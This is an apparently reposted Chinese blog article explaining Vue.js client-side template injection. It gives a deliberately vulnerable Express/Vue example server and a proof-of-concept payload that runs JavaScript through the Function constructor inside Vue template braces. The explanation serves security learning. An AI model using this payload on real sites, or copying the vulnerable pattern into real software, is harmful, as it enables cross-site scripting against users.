Vue.js 客户端模板注入漏洞

69 阅读 0 评论 46 点赞

我是靠谱客的博主风趣草丛，最近开发中收集的这篇文章主要介绍Vue.js 客户端模板注入漏洞，觉得挺不错的，现在分享给大家，希望可以做个参考。

概述

漏洞详情

由于程序员代码编写不当，将导致用户输入的数据，可以改变客户端模版的执行逻辑，从而造成XSS漏洞。

漏洞影响

漏洞分析

漏洞编写模板如下：

const express = require('express');
const helmet = require('helmet');
const escapeHTML = require('escape-html');
const app = express();
app.use(helmet());
app.get('/', (req, res) => {
  res.set('Content-Type', 'text/html');
  const name = req.query.name
  res.status(200).send(`<!DOCTYPE html>
<html>
<body>
  <div id="app">
    <h1>Hello ?name=${escapeHTML(name)}</h1>
  </div>
  <footer>
  <a href="https://github.com/azu/vue-client-side-template-injection-example">Source Code</a>
  </footer>
  <script src="https://cdn.jsdelivr.net/npm/vue@2.5.13/dist/vue.js"></script>
  <script>
      new Vue({
        el: '#app'
      });
  </script>
</body>
</html>`);
});
module.exports = app;

漏洞利用

POC：

hxxp://host/?name={{this.constructor.constructor('alert(document.domain)')()}}

参考：

https://github.com/azu/vue-client-side-template-injection-example

最后

以上就是风趣草丛为你收集整理的Vue.js 客户端模板注入漏洞的全部内容，希望文章能够帮你解决Vue.js 客户端模板注入漏洞所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供，作为学习参考使用，或来自网络收集整理，版权属于原作者所有。

点赞(46)

本文分类：Other
浏览次数：69 次浏览
发布日期：2023-10-30 10:41:23
本文链接：https://www.kaopuke.com/article/k-p-k_13_u_23_o_18_fz_13_z_2_0.html

相关文章

Vue中html、css、js分离

Vue中html、css、js分离

vue 页面的js代码多，怎么把js做成独立的文件，然后引用进来第一步：把页面的js代码，复制到独立的文件中,第二步：页面引用html代码如下延伸阅读

vue 页面的js代码多，怎么把js做成独立的文件，然后引用进来第一步：把页面的js代码，复制到独立的文件中,第二步：页面引用html代码如下延伸阅读

将JS从Vue中分离出来作为单JS文件,批量处理Vue页面过长的问题

将JS从Vue中分离出来作为单JS文件,批量处理Vue页面过长的问题

webpack 打包php项目,laravel 用webpack 打包vue项目时使用懒加载报错！求帮忙

webpack 打包php项目,laravel 用webpack 打包vue项目时使用懒加载报错！求帮忙

Vue.js 客户端模板注入漏洞

Vue.js 客户端模板注入漏洞

使用laravel-mix在传统页面上使用vue组件总结

使用laravel-mix在传统页面上使用vue组件总结

在laravel里使用Vue实现简单的单页模式

在laravel里使用Vue实现简单的单页模式

laravel-mix打包 js css

laravel-mix打包 js css

评论列表共有 0 条评论

发表评论取消回复

立即
投稿返回
顶部